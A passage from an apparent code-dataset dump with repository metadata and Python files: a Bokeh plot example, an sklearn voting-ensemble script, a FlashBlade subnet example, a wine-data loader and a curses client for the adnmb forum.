model.fit_transform(X)
# decomposition.NMF()
| 7,722 | 10 | 141 |
f9350d3119001689df5632afe7aa85da2f895288 | 221 | py | Python | big_data/bokeh_examples/function_example.py | paulhtremblay/big-data | dfa2aa9877300a57e7a9368af59c07fcc5841b4f | [
"MIT"
] | null | null | null | big_data/bokeh_examples/function_example.py | paulhtremblay/big-data | dfa2aa9877300a57e7a9368af59c07fcc5841b4f | [
"MIT"
] | 7 | 2020-06-05T18:13:25.000Z | 2022-03-11T23:19:48.000Z | big_data/bokeh_examples/function_example.py | paulhtremblay/big-data | dfa2aa9877300a57e7a9368af59c07fcc5841b4f | [
"MIT"
] | 1 | 2020-11-25T18:24:37.000Z | 2020-11-25T18:24:37.000Z | from bokeh.plotting import figure, show
import numpy as np
if __name__ == '__main__':
p = plot_func()
show(p)
| 15.785714 | 40 | 0.59276 | from bokeh.plotting import figure, show
import numpy as np
def plot_func():
x = np.linspace(0,1,100)
print(x)
y = [x * x for x in x]
print(y)
if __name__ == '__main__':
p = plot_func()
show(p)
| 77 | 0 | 23 |
2758200c7b9b4e23118e91e0e479902f4cc9a02c | 68 | py | Python | src/vessel-drift-analysis/vessel_drift_analysis/vessel_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | src/vessel-drift-analysis/vessel_drift_analysis/vessel_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | src/vessel-drift-analysis/vessel_drift_analysis/vessel_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | # Calculations related to estimate probability of a vessel drifting
| 34 | 67 | 0.838235 | # Calculations related to estimate probability of a vessel drifting
| 0 | 0 | 0 |
f678b30434cfbcab5a3a8a898d0a71ec304355f1 | 919 | py | Python | voteModels.py | TheaGao/SklearnModel | fe445cddd4fde9acdc87e7e7b3fbc356d1c586aa | [
"MIT"
] | 1 | 2017-12-22T08:51:43.000Z | 2017-12-22T08:51:43.000Z | voteModels.py | TheaGao/SklearnModel | fe445cddd4fde9acdc87e7e7b3fbc356d1c586aa | [
"MIT"
] | null | null | null | voteModels.py | TheaGao/SklearnModel | fe445cddd4fde9acdc87e7e7b3fbc356d1c586aa | [
"MIT"
] | null | null | null | from sklearn.externals import joblib
from preprocessData import getDataXY, get_accuracy
trainX, trainY, testX, testY, validX, validY = getDataXY()
print type(trainY)
models = ['Models/dt0.58.pkl', 'Models/NB0.59.pkl', 'Models/NC0.57.pkl',
'Models/NNP0.61.pkl', 'Models/sgd0.54.pkl']
all_pre = []
for model in models:
print model
clf = joblib.load(model)
predicY = clf.predict(validX)
all_pre.append(predicY)
print get_accuracy(voteIt(all_pre), testY)
| 20.886364 | 83 | 0.644178 | from sklearn.externals import joblib
from preprocessData import getDataXY, get_accuracy
# Load the dataset splits and collect predictions from each saved model
# (Python 2 script: note the print statements).
trainX, trainY, testX, testY, validX, validY = getDataXY()
print type(trainY)
models = ['Models/dt0.58.pkl', 'Models/NB0.59.pkl', 'Models/NC0.57.pkl',
          'Models/NNP0.61.pkl', 'Models/sgd0.54.pkl']
all_pre = []
for model in models:
    print model
    # Each .pkl is a fitted sklearn classifier; predict on the validation set.
    clf = joblib.load(model)
    predicY = clf.predict(validX)
    all_pre.append(predicY)
def voteIt(allResults):
    """Majority-vote ensemble over per-classifier predictions.

    *allResults* is a list of equal-length prediction sequences, one per
    classifier, with labels 'sing'/'nosing'.  Returns one label per sample;
    ties go to 'nosing'.
    """
    combined = []
    for sample_idx in range(len(allResults[0])):
        votes = [predictions[sample_idx] for predictions in allResults]
        winner = 'sing' if votes.count('sing') > votes.count('nosing') else 'nosing'
        combined.append(winner)
    return combined
print get_accuracy(voteIt(all_pre), testY)
| 401 | 0 | 23 |
a1ab82d17d46b556b507ef9ff87a538c36628057 | 327 | py | Python | docs/source/examples/FB2.0/patch_subnets.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 14 | 2018-12-07T18:30:27.000Z | 2022-02-22T09:12:33.000Z | docs/source/examples/FB2.0/patch_subnets.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 28 | 2019-09-17T21:03:52.000Z | 2022-03-29T22:07:35.000Z | docs/source/examples/FB2.0/patch_subnets.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 15 | 2020-06-11T15:50:08.000Z | 2022-03-21T09:27:25.000Z | from pypureclient.flashblade import Subnet
# update a subnet's gateway by name
res = client.patch_subnets(
names=['mysubnet'], subnet=Subnet(gateway='1.2.3.1'))
print(res)
if type(res) == pypureclient.responses.ValidResponse:
print(list(res.items))
# Other valid fields: ids
# See section "Common Fields" for examples
| 29.727273 | 57 | 0.743119 | from pypureclient.flashblade import Subnet
# update a subnet's gateway by name
res = client.patch_subnets(
    names=['mysubnet'], subnet=Subnet(gateway='1.2.3.1'))
print(res)
# isinstance() instead of an exact `type(...) ==` comparison: idiomatic and
# also accepts ValidResponse subclasses.
if isinstance(res, pypureclient.responses.ValidResponse):
    print(list(res.items))
# Other valid fields: ids
# See section "Common Fields" for examples
| 0 | 0 | 0 |
06f951e3283966b724d8baaa6c24390241496a9d | 667 | py | Python | dataset-processor2.py | Pawel762/class5-homework | 8e48dcda1ed91b7a5e28bea6db13b2a82182e074 | [
"MIT"
] | null | null | null | dataset-processor2.py | Pawel762/class5-homework | 8e48dcda1ed91b7a5e28bea6db13b2a82182e074 | [
"MIT"
] | null | null | null | dataset-processor2.py | Pawel762/class5-homework | 8e48dcda1ed91b7a5e28bea6db13b2a82182e074 | [
"MIT"
] | null | null | null | import pandas as pd
import matplotlib.pyplot as plt
wine_df = pd.read_csv(filepath_or_buffer='~/class5-homework/wine.data',
sep=',',
header=None)
wine_df.columns = ['Class','Alcohol','Malic_Acid','Ash','Alcalinity_of_Ash','Magnesium',
'Total_Phenols','Flavanoids','Nonflavanoid_Phenols','Proanthocyanins',
'Color_Intensity','Hue','OD280_OD315_of_Diluted_Wines','Proline']
pd.set_option('display.max_columns', None)
#Display dataset in table format
#print(wine_df.to_string())
#Display stats of dataset without the Class column
wine_B = wine_df.drop(['Class'], axis = 1)
print(wine_B.describe())
| 29 | 88 | 0.688156 | import pandas as pd
import matplotlib.pyplot as plt
# Load the UCI wine dataset (headerless CSV) and name its 14 columns.
wine_df = pd.read_csv(filepath_or_buffer='~/class5-homework/wine.data',
                      sep=',',
                      header=None)
wine_df.columns = ['Class','Alcohol','Malic_Acid','Ash','Alcalinity_of_Ash','Magnesium',
                   'Total_Phenols','Flavanoids','Nonflavanoid_Phenols','Proanthocyanins',
                   'Color_Intensity','Hue','OD280_OD315_of_Diluted_Wines','Proline']
# Show all columns when printing summaries.
pd.set_option('display.max_columns', None)
#Display dataset in table format
#print(wine_df.to_string())
#Display stats of dataset without the Class column
wine_B = wine_df.drop(['Class'], axis = 1)
print(wine_B.describe())
| 0 | 0 | 0 |
34447222ec8b637e61000a67d97c637fdcfc8fe1 | 12,689 | py | Python | fun.py | heixiaobai/adnmb-cli | da8701bf301e9199ec79a584617cd131a4c08611 | [
"MIT"
] | 1 | 2021-11-11T02:19:41.000Z | 2021-11-11T02:19:41.000Z | fun.py | heixiaobai/adnmb-cli | da8701bf301e9199ec79a584617cd131a4c08611 | [
"MIT"
] | null | null | null | fun.py | heixiaobai/adnmb-cli | da8701bf301e9199ec79a584617cd131a4c08611 | [
"MIT"
] | 1 | 2021-11-11T02:20:49.000Z | 2021-11-11T02:20:49.000Z | import re
import curses
import config
import time
import api
# 自定义的所有函数
# conf: 从config获取来自默认或者用户定义的配置信息
conf = config.config_info
# cont: 在运行过程中保存关于运行状态以及用于控制的信息
cont = config.control_info
# 全局使用,当前所访问版块的全部内容
thread_list = {}
# 全局使用,当前所访问的串的全部内容
post_list = {}
# TODO:注释
cont['browse_now_list'] = 0
# TODO: 需要把自定义版块,目前为直接获取
forum_list = api.get_forum_list('adnmb')
ss = pad_b = pad_i = pad_c = None
def stdscr_pad(stdscr: object, pad_browse: object, pad_info: object, pad_control: object):
    """
    Store stdscr and the three pad objects in module globals so every
    function in this module can draw on them.
    """
    global ss, pad_b, pad_i, pad_c
    ss = stdscr
    pad_b = pad_browse
    pad_i = pad_info
    pad_c = pad_control
def pad_browse_print(text: str):
    """
    Write text to the browse pad (main content area).

    :param text: text to display
    """
    pad_b.clear()
    pad_b.addstr(0, 0, text)
    # Visible region stops two rows short of the bottom (info + command bars).
    pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def pad_info_print(text: str):
    """
    Write text to the info bar (second row from the bottom).

    :param text: text to display; should not exceed the terminal width
    """
    pad_i.clear()
    pad_i.addstr(0, 0, text)
    y = curses.LINES - 2
    pad_i.refresh(0, 0, y, 0, y, curses.COLS - 1)
def init_pair_color():
    """Initialise curses color pairs from the color scheme.  Must be called
    after the terminal has been initialised."""
    scheme = config.color_info[0]
    for pair_id, colors in scheme.items():
        # colors[0] is foreground, colors[1] is background.
        curses.init_pair(int(pair_id), colors[0], colors[1])
def id_color(admin: str, user_id: str = None, po_id: str = None) -> int:
    """
    Build the curses color attribute for a user id from the color scheme
    (curses attributes are combined via bit flags).

    :param admin: '1' when the poster is an admin ("red name")
    :param user_id: the post's cookie/user id
    :param po_id: the thread starter's id
    :return: curses attribute value (0 = default)
    """
    # TODO: color definition for Po ids
    c0 = config.color_info[0]
    c1 = config.color_info[1]
    color_code = 0
    if admin == '1':
        # c0[...][2] carries the extra attribute bits (e.g. bold) to OR in.
        color_code = curses.color_pair(c1["admin_id"]) + c0[str(c1["admin_id"])][2]
        if user_id == po_id:
            color_code = curses.color_pair(c1["admin_po_id"]) + c0[str(c1["admin_po_id"])][2]
    elif user_id == po_id:
        color_code = curses.color_pair(c1["po_id"]) + c0[str(c1["po_id"])][2]
    return color_code
def show_time(post_time: str) -> str:
    """
    Reformat an API timestamp ("YYYY-MM-DD(weekday)HH:MM:SS") into the
    user-configured time format.

    :param post_time: raw timestamp string from the API JSON
    :return: timestamp formatted with conf['time_format']
    """
    # Drop the parenthesised weekday so strptime can parse the rest.
    cleaned = re.sub(r"\(.*\)", " ", post_time)
    parsed = time.strptime(cleaned, "%Y-%m-%d %H:%M:%S")
    timestamp = int(time.mktime(parsed))
    return time.strftime(conf['time_format'], time.localtime(timestamp))
def content_process(text: str) -> str:
    """
    Strip HTML line breaks (``<br />``) and carriage returns from post
    content.

    :param text: raw post body from the API
    :return: cleaned text
    """
    return re.sub(r"<br />|\r", "", text)
def forum_data_process(data: list, page: int):
    """
    Process the thread list fetched from the API and store it in the module
    global ``thread_list``, keyed by page number.

    Each stored entry maps field name -> ``[value, color_attr]``:
    id (thread no.), userid (poster cookie), f_name (forum name),
    now (formatted time), content (post body), rC (reply count).

    :param data: list of thread dicts from the API JSON
    :param page: page number used as the storage key
    """
    global thread_list
    thread_list[str(page)] = []
    for d in data:
        thread_list[str(page)].append(
            {
                'id': [d['id'], 0],
                # BUG FIX: arguments were swapped (userid passed as `admin`),
                # so admin posts were never highlighted in the forum view.
                # Matches the correct call order in thread_data_process.
                'userid': [d['userid'], id_color(d['admin'], d['userid'])],
                'f_name': ['', 0],
                'now': [show_time(d['now']), 0],
                'content': [content_process(d['content']), 0],
                'rC': [d['replyCount'], 0]
            }
        )
    # Timeline-style listings include a 'fid' per thread; resolve it to a
    # forum name.  (Was `data[1]`, which raised IndexError on short pages.)
    if data and 'fid' in data[0]:
        for i in range(len(data)):
            thread_list[str(page)][i]['f_name'] = [forum_list[data[i]['fid']], 0]
def thread_data_process(data: dict, page: int = 1):
    """
    Process a thread's reply list fetched from the API and store it in the
    module global ``post_list``, keyed by page number.
    """
    global post_list
    # Stored values (post no., cookie, ...) are [content, color_attr] pairs.
    c = config.color_info[1]
    p = curses.color_pair
    post_list[str(page)] = []
    # Keep the thread's basic metadata alongside the pages.
    post_list['po_id'] = data['userid']
    post_list['tid'] = data['id']
    post_list['fid'] = data['fid']
    post_list['rC'] = data['replyCount']
    if page == 1:
        # Page 1 starts with the opening post itself.
        post_list[str(page)].append({
            'id': [data['id'], p(c["post_id"])],
            'userid': [data['userid'], id_color(data['admin'], data['userid'], data['userid'])],
            'now': [show_time(data['now']), p(c["time"])],
            'content': [data['content'], p(c["content"])]
        })
    data = data['replys']
    for i in range(len(data)):
        d = data[i]
        post_list[str(page)].append(
            {
                'id': [str(d['id']), p(c["post_id"])],
                'userid': [d['userid'], id_color(d['admin'], d['userid'], post_list['po_id'])],
                'now': [show_time(d['now']), p(c["time"])],
                'content': [d['content'], p(c["content"])]
            }
        )
def pad_browse_update(v_type: str, page: int):
    """
    Redraw the browse pad from the module globals ``thread_list`` or
    ``post_list``.

    :param v_type: 'forum' or 'thread'
    :param page: page number to render
    """
    pad_b.move(0, 0)
    data = None
    global thread_list, post_list, cont
    if v_type == 'forum':
        data = thread_list[str(page)]
    elif v_type == 'thread':
        data = post_list[str(page)]
    pad_b.clear()
    for i in range(len(data)):
        # Header line: index, cookie, post no., reply count, forum name.
        y = pad_b.getyx()[0]
        # pi holds the column positions for each header field.
        pi = conf['theme']
        d = data[i]
        pad_b.addstr("[" + str(i) + "]")
        pad_b.move(y, pi[0])
        pad_b.addstr(d['userid'][0], d['userid'][1])
        pad_b.move(y, pi[1])
        pad_b.addstr("No." + d['id'][0], d['id'][1])
        if v_type == 'forum':
            pad_b.move(y, pi[2])
            pad_b.addstr("[" + d['rC'][0] + "]", d['rC'][1])
            pad_b.move(y, pi[3])
        pad_b.move(y + 1, 0)
        # Post body, followed by a separator line.
        pad_b.addstr(d['content'][0], d['content'][1])
        pad_b.move(pad_b.getyx()[0] + 1, 0)
        pad_b.addstr("-" * int(curses.COLS / 3), 0)
        pad_b.move(pad_b.getyx()[0] + 2, 0)
    # Reset the scroll position and remember where the content ends.
    cont['browse_now_line'] = 0
    cont['browse_end_line'] = pad_b.getyx()[0] - 2
    pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def forum(fid: str, page: int = 1):
    """
    Visit a forum board and render its thread list.

    :param fid: forum id
    :param page: page number
    """
    global cont
    cont['now_page'] = page
    r = api.get_showf(fid, page)
    # The API returns a JSON list on success, an error string otherwise.
    if type(r.json()) is list:
        cont['input_command_info'] = ""
        forum_data_process(r.json(), page)
        pad_browse_update('forum', page)
        t = 'location'
        cont[t][0], cont[t][1], cont[t][3], cont['location_text'] = \
            "forum", fid, page, forum_list[fid]
        # pad_info_print(cont['location'][1])
    else:
        pad_info_print(r.json())
def thread(tid: str, page: int = 1):
    """
    Visit a thread and render its replies.

    :param tid: thread number
    :param page: page number
    """
    global cont
    cont['now_page'] = page
    r = api.get_thread(tid, page)
    # The API returns a JSON object on success, an error string otherwise.
    if type(r.json()) is not str:
        cont['input_command_info'] = ""
        thread_data_process(r.json(), page)
        pad_browse_update('thread', page)
        t = 'location'
        cont[t][0], cont[t][1], cont[t][2], cont[t][3], cont['location_text'] = \
            "thread", post_list['fid'], tid, page, forum_list[r.json()['fid']] + "/No." + tid
        # pad_info_print(cont['back_list'][-1][2])
    else:
        pad_info_print(r.json())
def pad_control_update():
    """Redraw the command bar (bottom row) from the current control state."""
    typed = ''.join(cont['input_command_char'])
    pad_c.clear()
    pad_c.move(0, 0)
    pad_c.addstr(0, 0, conf['command_char'])
    pad_c.addstr(0, 20, cont['location_text'])
    pad_c.addstr(0, 2, cont['input_command_info'])
    pad_c.addstr(0, 8, typed)
    if cont['input_command_info'] == "" and typed == "":
        # Nothing being typed: park the cursor right after the prompt char.
        pad_c.move(0, 2)
    pad_c.refresh(0, 0, curses.LINES - 1, 0, curses.LINES - 1, curses.COLS - 1)
def print_forum_list():
    """
    Render the forum list in the browse pad, as columns separated by '|'.
    """
    pad_b.clear()
    pad_b.move(0, 0)
    cols_count = 0
    cont['location'][0] = "forum_list"
    for i in forum_list.keys():
        # Pad the forum id to 5 cells, then its name.
        pad_b.addstr(i + (5 - len(i)) * " " + forum_list[i], 0)
        cols_count += 18
        # Start a new column while at least 18 cells remain, else wrap.
        if (curses.COLS - cols_count) > 18:
            pad_b.move(pad_b.getyx()[0], cols_count)
            pad_b.addstr("|")
        else:
            pad_b.move(pad_b.getyx()[0] + 1, 0)
            cols_count = 0
    pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def control_visit(v_type: str):
    """
    Read a forum/thread number from the command bar and visit it.
    Accepts digits (plus '-' for forum ids); Backspace edits, Enter
    confirms, 'q' cancels.

    :param v_type: 'forum' or 'thread'
    :raises ValueError: for any other v_type
    """
    global cont
    if v_type == 'forum':
        prompt = "版号:"
        char_max_len = 4
        char_ord_list = [45] + list(range(48, 58))   # '-' plus '0'..'9'
    elif v_type == "thread":
        prompt = "串号:"
        char_max_len = 8
        char_ord_list = list(range(48, 58))          # '0'..'9'
    else:
        # BUG FIX: previously any other v_type left char_max_len /
        # char_ord_list unbound, raising NameError on the first keypress.
        raise ValueError("v_type must be 'forum' or 'thread', got %r" % (v_type,))
    cont['input_command_char'] = []
    cont['input_command_info'] = prompt
    pad_control_update()
    while True:
        cc = pad_c.getch()
        if cc in char_ord_list and len(cont['input_command_char']) <= char_max_len:
            # Allowed character and below the length limit.
            cont['input_command_char'].append(chr(cc))
            pad_control_update()
        elif (cc == 127 or cc == 263) and cont['input_command_char']:
            # Backspace (DEL or KEY_BACKSPACE)
            cont['input_command_char'].pop()
            pad_control_update()
        elif cc == 10 and cont['input_command_char']:
            # Enter: join the typed characters and visit the target.
            target = ''.join(cont['input_command_char'])
            if v_type == "forum":
                forum(target)
            else:
                thread(target)
            break
        elif cc == ord('q'):
            break
def go_thread():
    """
    Jump to a thread by the list index shown by pad_browse_update().
    """
    global cont
    cont['input_command_char'] = []
    cont['input_command_info'] = "序号: "
    pad_control_update()
    while True:
        cc = pad_c.getch()
        # NOTE(review): range(45, 58) also admits '-', '.', '/' besides
        # digits — confirm whether that is intended.
        if cc in list(range(45, 58)) and len(cont['input_command_char']) <= 2:
            cont['input_command_char'].append(chr(cc))
            pad_control_update()
        elif (cc == 127 or cc == 263) and cont['input_command_char']:
            # Backspace (DEL or KEY_BACKSPACE)
            cont['input_command_char'].pop()
            pad_control_update()
        elif cc == 10 and cont['input_command_char']:
            # Enter: resolve the typed index to the thread id on this page.
            tmp = ""
            for i in cont['input_command_char']:
                tmp += i
            tmp = thread_list[str(cont['now_page'])][int(tmp)]['id'][0]
            thread(tmp)
            break
        elif cc == ord('q'):
            curses_end()
def page_down():
    """
    Scroll the browse pad down by up to 10 lines, clamped to the content end.
    TODO: make the step configurable, or scroll half/full screens.
    """
    global cont
    # Lines of content below the bottom of the visible window.
    i = cont['browse_end_line'] - (curses.LINES - 3)
    j = i - cont['browse_now_line']
    if j >= 10:
        cont['browse_now_line'] += 10
    elif j > 0:
        cont['browse_now_line'] += j
    pad_b.refresh(cont['browse_now_line'], 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def page_up():
    """
    使pad_b向上翻页,一次最多10行
    TODO: 后期尝试将page_down和page_up合并
    """
    global cont
    # 一次最多后退10行,不越过第0行
    step = min(10, cont['browse_now_line'])
    if step > 0:
        cont['browse_now_line'] -= step
    pad_b.refresh(cont['browse_now_line'], 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def next_page():
    """
    访问版块或串的下一页
    """
    global cont
    location = cont['location']
    if location[0] == "forum":
        cont['now_page'] += 1
        forum(location[1], cont['now_page'])
    elif location[0] == "thread":
        # 每页18条回复,向上取整得到总页数,避免翻出最后一页
        reply_count = int(post_list['rC'])
        total_pages = (reply_count + 17) // 18
        if cont['now_page'] < total_pages:
            cont['now_page'] += 1
            thread(location[2], cont['now_page'])
def previous_page():
    """
    访问版块或串的上一页
    """
    global cont
    if cont['now_page'] <= 0:
        # 已经在第一页,无处可退
        return
    view_kind = cont['location'][0]
    if view_kind == "forum":
        cont['now_page'] -= 1
        forum(cont['location'][1], cont['now_page'])
    elif view_kind == "thread":
        cont['now_page'] -= 1
        thread(cont['location'][2], cont['now_page'])
| 27.465368 | 96 | 0.533691 | import re
import curses
import config
import time
import api
# 自定义的所有函数
# conf: 从config获取来自默认或者用户定义的配置信息
conf = config.config_info
# cont: 在运行过程中保存关于运行状态以及用于控制的信息
cont = config.control_info
# 全局使用,当前所访问版块的全部内容
thread_list = {}
# 全局使用,当前所访问的串的全部内容
post_list = {}
# TODO:注释
cont['browse_now_list'] = 0
# TODO: 需要把自定义版块,目前为直接获取
forum_list = api.get_forum_list('adnmb')
ss = pad_b = pad_i = pad_c = None
def curses_end():
ss.keypad(False)
curses.nocbreak()
curses.echo()
curses.endwin()
def stdscr_pad(stdscr: object, pad_browse: object, pad_info: object, pad_control: object):
"""
传入stdscr和3个pad对象,供所有函数操作
"""
global ss, pad_b, pad_i, pad_c
ss = stdscr
pad_b = pad_browse
pad_i = pad_info
pad_c = pad_control
def pad_browse_print(text: str):
"""
向浏览区pad输出内容
:param text: 文本内容
"""
pad_b.clear()
pad_b.addstr(0, 0, text)
pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def pad_info_print(text: str):
"""
向信息提示栏输出内容
:param text: 文本内容,显示长度应不大于终端宽度
"""
pad_i.clear()
pad_i.addstr(0, 0, text)
y = curses.LINES - 2
pad_i.refresh(0, 0, y, 0, y, curses.COLS - 1)
def init_pair_color():
"""
根据配色方案定义的颜色初始化颜色,需要在终端初始化之后再运行
"""
c = config.color_info[0]
for i in c.keys():
curses.init_pair(int(i), c[i][0], c[i][1])
def id_color(admin: str, user_id: str = None, po_id: str = None) -> int:
"""
从配色方案定义id的颜色标识(curses颜色标识通过bit位组合)
:param admin: 是否红名标识符
:param user_id: post的用户id
:param po_id: po主的id
:return: curses的颜色标识符
"""
# TODO: Po id的颜色定义
c0 = config.color_info[0]
c1 = config.color_info[1]
color_code = 0
if admin == '1':
color_code = curses.color_pair(c1["admin_id"]) + c0[str(c1["admin_id"])][2]
if user_id == po_id:
color_code = curses.color_pair(c1["admin_po_id"]) + c0[str(c1["admin_po_id"])][2]
elif user_id == po_id:
color_code = curses.color_pair(c1["po_id"]) + c0[str(c1["po_id"])][2]
return color_code
def show_time(post_time: str) -> str:
"""
把从Api获取到的时间格式转为自定义的格式
:param post_time: 从api的json获取到的原时间
:return: 自定义事件格式
"""
timestamp_int = int(
time.mktime(time.strptime(re.sub(r"\(.*\)", " ", post_time), "%Y-%m-%d %H:%M:%S")))
return time.strftime(conf['time_format'], time.localtime(timestamp_int))
def content_process(text: str) -> str:
"""
简单处理掉一些不必要的内容
<br />, \r
:param text:
:return:
"""
text = re.sub(r"<br />|\r", "", text)
# data = ""
# n = 0
# for i in text:
# if i == "\n":
# n += 1
# if n == config_info['thread_content_line']:
# break
# data += i
return text
def forum_data_process(data: list, page: int):
"""
处理从API获取到的版块串列表,以page为key存储到thread_list中
:param data: 从api获取的json
:param page: 页数
"""
global thread_list
thread_list[str(page)] = []
"""
数据说明:
id: 串号
userid: po的饼干
f_name: 版块名
now: 自定义格式化之后的事件
content: 串内容
rC: 串回复数量
"""
for i in range(len(data)):
d = data[i]
thread_list[str(page)].append(
{
'id': [d['id'], 0],
'userid': [d['userid'], id_color(d['userid'], d['admin'])],
'f_name': ['', 0],
'now': [show_time(d['now']), 0],
'content': [content_process(d['content']), 0],
'rC': [d['replyCount'], 0]
}
)
if 'fid' in data[1].keys():
for i in range(len(data)):
thread_list[str(page)][i]['f_name'] = [forum_list[data[i]['fid']], 0]
def thread_data_process(data: dict, page: int = 1):
"""
处理从API获取到的串回复列表,以page为key存储到post_list中
"""
global post_list
# 存储(串号,饼干等……)时为list,[内容,配色]
c = config.color_info[1]
p = curses.color_pair
post_list[str(page)] = []
# 将串基本信息对应id存储
post_list['po_id'] = data['userid']
post_list['tid'] = data['id']
post_list['fid'] = data['fid']
post_list['rC'] = data['replyCount']
if page == 1:
post_list[str(page)].append({
'id': [data['id'], p(c["post_id"])],
'userid': [data['userid'], id_color(data['admin'], data['userid'], data['userid'])],
'now': [show_time(data['now']), p(c["time"])],
'content': [data['content'], p(c["content"])]
})
data = data['replys']
for i in range(len(data)):
d = data[i]
post_list[str(page)].append(
{
'id': [str(d['id']), p(c["post_id"])],
'userid': [d['userid'], id_color(d['admin'], d['userid'], post_list['po_id'])],
'now': [show_time(d['now']), p(c["time"])],
'content': [d['content'], p(c["content"])]
}
)
def pad_browse_update(v_type: str, page: int):
"""
从全局变量thread_list或post_list更新浏览区
:param v_type: forum, thread
:param page: 页数
"""
pad_b.move(0, 0)
data = None
global thread_list, post_list, cont
if v_type == 'forum':
data = thread_list[str(page)]
elif v_type == 'thread':
data = post_list[str(page)]
pad_b.clear()
for i in range(len(data)):
# 串信息:序号 串号 饼干 回复数 版块名
y = pad_b.getyx()[0]
pi = conf['theme']
d = data[i]
pad_b.addstr("[" + str(i) + "]")
pad_b.move(y, pi[0])
pad_b.addstr(d['userid'][0], d['userid'][1])
pad_b.move(y, pi[1])
pad_b.addstr("No." + d['id'][0], d['id'][1])
if v_type == 'forum':
pad_b.move(y, pi[2])
pad_b.addstr("[" + d['rC'][0] + "]", d['rC'][1])
pad_b.move(y, pi[3])
pad_b.move(y + 1, 0)
# 串内容
pad_b.addstr(d['content'][0], d['content'][1])
pad_b.move(pad_b.getyx()[0] + 1, 0)
pad_b.addstr("-" * int(curses.COLS / 3), 0)
pad_b.move(pad_b.getyx()[0] + 2, 0)
cont['browse_now_line'] = 0
cont['browse_end_line'] = pad_b.getyx()[0] - 2
pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def forum(fid: str, page: int = 1):
"""
访问指定版块
:param fid: 指定版块id
:param page: 指定页数
"""
global cont
cont['now_page'] = page
r = api.get_showf(fid, page)
if type(r.json()) is list:
cont['input_command_info'] = ""
forum_data_process(r.json(), page)
pad_browse_update('forum', page)
t = 'location'
cont[t][0], cont[t][1], cont[t][3], cont['location_text'] = \
"forum", fid, page, forum_list[fid]
# pad_info_print(cont['location'][1])
else:
pad_info_print(r.json())
def thread(tid: str, page: int = 1):
"""
访问指定串
:param tid: 指定串号
:param page: 指定页数
"""
global cont
cont['now_page'] = page
r = api.get_thread(tid, page)
if type(r.json()) is not str:
cont['input_command_info'] = ""
thread_data_process(r.json(), page)
pad_browse_update('thread', page)
t = 'location'
cont[t][0], cont[t][1], cont[t][2], cont[t][3], cont['location_text'] = \
"thread", post_list['fid'], tid, page, forum_list[r.json()['fid']] + "/No." + tid
# pad_info_print(cont['back_list'][-1][2])
else:
pad_info_print(r.json())
def pad_control_update():
"""
根据cont的信息更新控制栏pad
"""
icc = ""
for i in cont['input_command_char']:
icc += i
pad_c.clear()
pad_c.move(0, 0)
pad_c.addstr(0, 0, conf['command_char'])
pad_c.addstr(0, 20, cont['location_text'])
pad_c.addstr(0, 2, cont['input_command_info'])
pad_c.addstr(0, 8, icc)
if cont['input_command_info'] == "" and icc == "":
pad_c.move(0, 2)
pad_c.refresh(0, 0, curses.LINES - 1, 0, curses.LINES - 1, curses.COLS - 1)
def print_forum_list():
"""
打印版块列表
"""
pad_b.clear()
pad_b.move(0, 0)
cols_count = 0
cont['location'][0] = "forum_list"
for i in forum_list.keys():
pad_b.addstr(i + (5 - len(i)) * " " + forum_list[i], 0)
cols_count += 18
if (curses.COLS - cols_count) > 18:
pad_b.move(pad_b.getyx()[0], cols_count)
pad_b.addstr("|")
else:
pad_b.move(pad_b.getyx()[0] + 1, 0)
cols_count = 0
pad_b.refresh(0, 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def control_visit(v_type: str):
"""
访问版块或串号,调用后从pad_c捕获用户键盘输入
:param v_type: forum/thread
"""
global cont
cont['input_command_char'] = []
if v_type == 'forum':
cont['input_command_info'] = "版号:"
char_max_len = 4
char_ord_list = [45] + list(range(48, 58))
elif v_type == "thread":
cont['input_command_info'] = "串号:"
char_max_len = 8
char_ord_list = list(range(48, 58))
pad_control_update()
while True:
cc = pad_c.getch()
if cc in char_ord_list and len(cont['input_command_char']) <= char_max_len:
# 符合限制规则且已输入内容不超过最大长度
cont['input_command_char'].append(chr(cc))
pad_control_update()
elif (cc == 127 or cc == 263) and cont['input_command_char']:
# Backspace/退格键
cont['input_command_char'].pop()
pad_control_update()
elif cc == 10 and cont['input_command_char']:
# Enter/回车键
tmp = ""
for i in cont['input_command_char']:
tmp += i
if v_type == "forum":
forum(tmp)
elif v_type == "thread":
thread(tmp)
break
elif cc == ord('q'):
break
def go_thread():
"""
访问指定串,根据pad_browse_update()提示的序号
"""
global cont
cont['input_command_char'] = []
cont['input_command_info'] = "序号: "
pad_control_update()
while True:
cc = pad_c.getch()
if cc in list(range(45, 58)) and len(cont['input_command_char']) <= 2:
# 符合限制规则且长度不大于2
cont['input_command_char'].append(chr(cc))
pad_control_update()
elif (cc == 127 or cc == 263) and cont['input_command_char']:
# Backspace/退格键
cont['input_command_char'].pop()
pad_control_update()
elif cc == 10 and cont['input_command_char']:
# Enter/回车键
tmp = ""
for i in cont['input_command_char']:
tmp += i
tmp = thread_list[str(cont['now_page'])][int(tmp)]['id'][0]
thread(tmp)
break
elif cc == ord('q'):
curses_end()
def page_down():
"""
使pad_b向下翻页,一次翻10行
TODO: 后期加入自定义行数或者翻页半屏/全屏
"""
global cont
i = cont['browse_end_line'] - (curses.LINES - 3)
j = i - cont['browse_now_line']
if j >= 10:
cont['browse_now_line'] += 10
